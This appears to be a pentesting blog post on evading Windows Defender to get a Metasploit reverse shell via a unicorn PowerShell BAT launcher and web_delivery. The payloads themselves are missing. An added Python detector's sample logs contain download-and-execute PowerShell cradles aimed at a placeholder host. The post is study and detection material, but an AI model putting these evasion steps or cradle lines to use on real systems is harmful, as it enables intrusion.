The main reason to write about it was that I found a cool idea to 'bypass' Windows Defender installed with Windows 10. I mean, I found it on github ;) Kudos to the author!
Nothing new, but maybe you'll find it useful during your pentest(s) ;) Some details for my case:
(...it was: normally I would use RDP to connect to the target and 'add my disk' to the connection; then you can copy/paste your payload.exe/.ps1... but this time it wasn't possible, so...)
With Windows Defender enabled (by default, afaik) I wasn't able to run a meterpreter-based payload prepared with Metasploit.
I prepared a PowerShell payload with unicorn and saved it on the target machine in a BAT file:
And now we can see some results:
As you can see, there is a green screen, so we are safe. ;]
After a few seconds there should be another nice screen:
...and now you are already (reverse_sh) connected, or the user will click anything (OK/Cancel) and the revshell will connect. No matter what, you should already have received a reverse shell.
I googled a bit more and found a cool idea (pretty similar to the one used in unicorn): web_delivery, described on the Offensive Security web page.
Checking:
Maybe you will find it useful too:
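From the blue-team side, both tricks above (the unicorn BAT launcher and web_delivery) end up spawning powershell.exe with either a base64 -EncodedCommand blob or a download-and-execute one-liner. The script below is an added example, not from the original post or from the unicorn/Metasploit projects: it decodes -EncodedCommand arguments from constructed process-creation log lines and flags the common download-cradle indicators. The log format, the stager string and the placeholder URL are all assumptions made up for the example.

```python
import base64
import re

# Substrings commonly seen in download-and-execute PowerShell launchers.
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
              "frombase64string", "-w hidden", "-nop")

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (case-insensitive).
ENC_RE = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def b64_utf16(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> dict:
    """Classify one command line: decode it if encoded, then look for cradle indicators."""
    decoded = decode_encoded_command(cmdline)
    effective = (cmdline + " " + (decoded or "")).lower()
    hits = sorted(i for i in SUSPICIOUS if i in effective)
    is_ps = "powershell" in cmdline.lower()
    return {"encoded": decoded is not None, "decoded": decoded,
            "indicators": hits, "suspicious": is_ps and (decoded is not None or bool(hits))}


def scan(lines):
    return [analyze(line) for line in lines]


# Constructed sample log lines (hypothetical format; stager.invalid is a placeholder host).
STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://stager.invalid/x')"
SAMPLE_LOGS = [
    "CommandLine: powershell.exe -nop -w hidden -e " + b64_utf16(STAGE),           # unicorn-style
    "CommandLine: powershell.exe -nop -w hidden -c $x=new-object net.webclient;"
    "IEX $x.downloadstring('http://stager.invalid/y')",                             # web_delivery-style
    "CommandLine: powershell.exe -File C:\\scripts\\backup.ps1",                     # benign admin task
]

if __name__ == "__main__":
    for line, result in zip(SAMPLE_LOGS, scan(SAMPLE_LOGS)):
        print(result["suspicious"], result["indicators"], "<-", line[:60])
```

Sysmon Event ID 4688/Sysmon 1 command lines are the natural input; the benign third line shows the check does not fire on plain script execution.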
Cheers